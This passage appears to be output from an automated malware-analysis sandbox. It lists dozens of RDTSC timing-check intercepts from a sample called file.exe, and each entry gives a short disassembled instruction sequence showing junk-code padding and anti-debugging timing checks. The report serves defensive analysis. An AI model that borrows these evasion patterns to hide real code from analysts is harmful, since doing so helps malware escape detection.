[ebp+1245946Eh], edx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push ebx 0x00000073 pop ebx 0x00000074 pop edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CF8D second address: 93CF92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93EF19 second address: 93EF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8FED second address: 8D8FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8FF3 second address: 8D9005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D9005 second address: 8D9009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483F6 second address: 9483FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C6D second address: 947C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB7D509B846h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C7A second address: 947C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C80 second address: 947C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B855h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C9D second address: 947CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94B3AA second address: 94B3B8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952391 second address: 952395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9510E6 second address: 9510EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9510EE second address: 951112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D50A5EEFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951112 second address: 95114B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B85Ah 0x00000008 jmp 00007FB7D509B854h 0x0000000d push edx 0x0000000e jmp 00007FB7D509B854h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95114B second address: 951150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951150 second address: 951156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95180A second address: 951819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5ED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951ADF second address: 951AE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AE5 second address: 951AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AF2 second address: 951AFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FB7D509B846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AFE second address: 951B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D50A5EE1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951C60 second address: 951C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951C64 second address: 951CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop esi 0x00000013 pushad 0x00000014 jg 00007FB7D50A5ED8h 0x0000001a pushad 0x0000001b popad 0x0000001c jl 00007FB7D50A5EE9h 0x00000022 jmp 00007FB7D50A5EE1h 0x00000027 push edi 0x00000028 pop edi 0x00000029 push eax 0x0000002a pushad 0x0000002b popad 0x0000002c js 00007FB7D50A5ED6h 0x00000032 pop eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951CA7 second address: 951CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951E4A second address: 951E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95508F second address: 95509C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95509C second address: 9550C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB7D50A5ED6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 pushad 0x00000012 popad 0x00000013 jne 00007FB7D50A5ED6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9598C4 second address: 959914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B857h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D509B856h 0x00000011 pushad 0x00000012 jmp 00007FB7D509B859h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959A6C second address: 959A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EB0 second address: 959EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EB6 second address: 959EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EBF second address: 959EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EC4 second address: 959ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959ED3 second address: 959ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A01A second address: 95A036 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D50A5ED6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FB7D50A5EDDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A1A6 second address: 95A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 popad 0x0000000a ja 00007FB7D509B862h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FB7D509B846h 0x00000018 jmp 00007FB7D509B84Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A33B second address: 95A341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AA98 second address: 95AA9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AA9E second address: 95AAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AAA8 second address: 95AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959310 second address: 959329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jne 00007FB7D50A5ED6h 0x0000000e pop ebx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB7D50A5ED6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959329 second address: 95932D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95932D second address: 959333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959333 second address: 959352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB7D509B851h 0x0000000c jl 00007FB7D509B84Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F712 second address: 95F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FB7D50A5ED8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF37 second address: 8DDF3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF3C second address: 8DDF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D50A5EE9h 0x0000000f js 00007FB7D50A5ED6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF67 second address: 8DDF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF6D second address: 8DDF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 920BCF second address: 909090 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B848h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D32E0h], esi 0x00000015 lea eax, dword ptr [ebp+1248593Ah] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FB7D509B848h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D36CFh], edx 0x0000003b or edi, 4D11FB41h 0x00000041 nop 0x00000042 pushad 0x00000043 jmp 00007FB7D509B855h 0x00000048 ja 00007FB7D509B848h 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FB7D509B853h 0x00000055 nop 0x00000056 or cl, 0000004Fh 0x00000059 call dword ptr [ebp+122D3497h] 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FB7D509B84Ch 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 920E03 second address: 920E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9210EB second address: 9210EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9210EF second address: 9210F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211C3 second address: 9211D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211D5 second address: 9211DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211DA second address: 92127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007FB7D509B859h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FB7D509B84Ah 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FB7D509B848h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov edi, dword ptr [ebp+122D2518h] 0x00000042 call 00007FB7D509B849h 0x00000047 jc 00007FB7D509B852h 0x0000004d push esi 0x0000004e jmp 00007FB7D509B84Ah 0x00000053 pop esi 0x00000054 push eax 0x00000055 jmp 00007FB7D509B858h 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e je 00007FB7D509B84Eh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92127D second address: 9212B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jns 00007FB7D50A5EE4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB7D50A5EE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921406 second address: 921410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921410 second address: 921465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007FB7D50A5EDAh 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB7D50A5ED8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3428h], ecx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jl 00007FB7D50A5ED8h 0x0000003c push edi 0x0000003d pop edi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921E19 second address: 921E4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FB7D509B846h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jns 00007FB7D509B848h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB7D509B858h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921F49 second address: 921F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jo 00007FB7D50A5ED6h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EDCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E92B second address: 95E943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E943 second address: 95E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E949 second address: 95E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E94D second address: 95E97C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EE3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E97C second address: 95E982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EDC5 second address: 95EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB7D50A5ED6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jbe 00007FB7D50A5ED6h 0x00000014 jnl 00007FB7D50A5ED6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F061 second address: 95F07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB7D509B84Bh 0x0000000b jmp 00007FB7D509B84Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F07C second address: 95F080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F4D second address: 8E2F75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D509B85Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F75 second address: 8E2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F7B second address: 8E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B848h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F88 second address: 8E2F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2F8F second address: 8E2FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D509B84Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2FA7 second address: 8E2FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693C6 second address: 9693D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693D4 second address: 9693D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693D8 second address: 9693FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B84Bh 0x0000000d jmp 00007FB7D509B854h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9693FF second address: 969403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96952C second address: 96954C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FB7D509B846h 0x00000010 jp 00007FB7D509B846h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96911E second address: 969122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E43B second address: 96E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E43F second address: 96E44C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E44C second address: 96E477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f je 00007FB7D509B846h 0x00000015 jmp 00007FB7D509B84Ch 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E477 second address: 96E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DC5F second address: 96DC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DC63 second address: 96DCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB7D50A5EDEh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DCA3 second address: 96DCB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB7D509B84Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB7D509B846h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DCB9 second address: 96DCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
